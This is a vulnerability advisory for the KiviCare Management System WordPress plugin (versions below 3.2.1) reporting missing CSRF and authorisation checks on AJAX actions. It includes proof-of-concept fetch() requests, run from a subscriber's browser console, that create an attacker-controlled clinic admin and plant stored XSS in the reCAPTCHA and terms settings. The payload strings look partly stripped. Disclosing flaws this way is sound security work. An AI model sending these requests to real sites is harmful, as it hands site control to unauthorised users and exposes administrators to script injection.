KiviCare Management System < 3.2.1 - Subscriber+ Unauthorised AJAX Calls

The plugin does not have proper CSRF and authorisation checks in various AJAX actions, allowing any authenticated users, such as subscriber to call them. Attacks include but are not limited to: Add arbitrary Clinic Admin/Doctors/etc and update plugin’s settings

PoC

Run one of the below commands in the developer console of the web browser while being on the blog as subscriber user. To add a clinic admin: fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=ajax_post&route;_name=setup_clinic_admin&first;_name=Attacker&last;_name=Attacker&user;[email protected]&mobile;_number=11&gender;=other’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Then login with the username and credentials sent to the [email protected] email address To update the Recaptcha settings (with an XSS payload) fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=ajax_post&route;_name=save_google_recaptcha_setting&status;=on&site;_key=&secret;_key=’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); The XSS will be triggered when an admin open https://example.com/wp-admin/admin-ajax.php?action=ajax_get&amp;route;_name=get_all_general_setting To update the term and conditions message with an XSS payload: fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=ajax_post&route;_name=terms_condition_save&isVisible;=1&content;=“>”’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Then the XSS will be triggered when accessing https://example.com/wp-admin/admin-ajax.php?action=ajax_get&amp;route;_name=terms_condition_list (there might be other location the payload is triggered)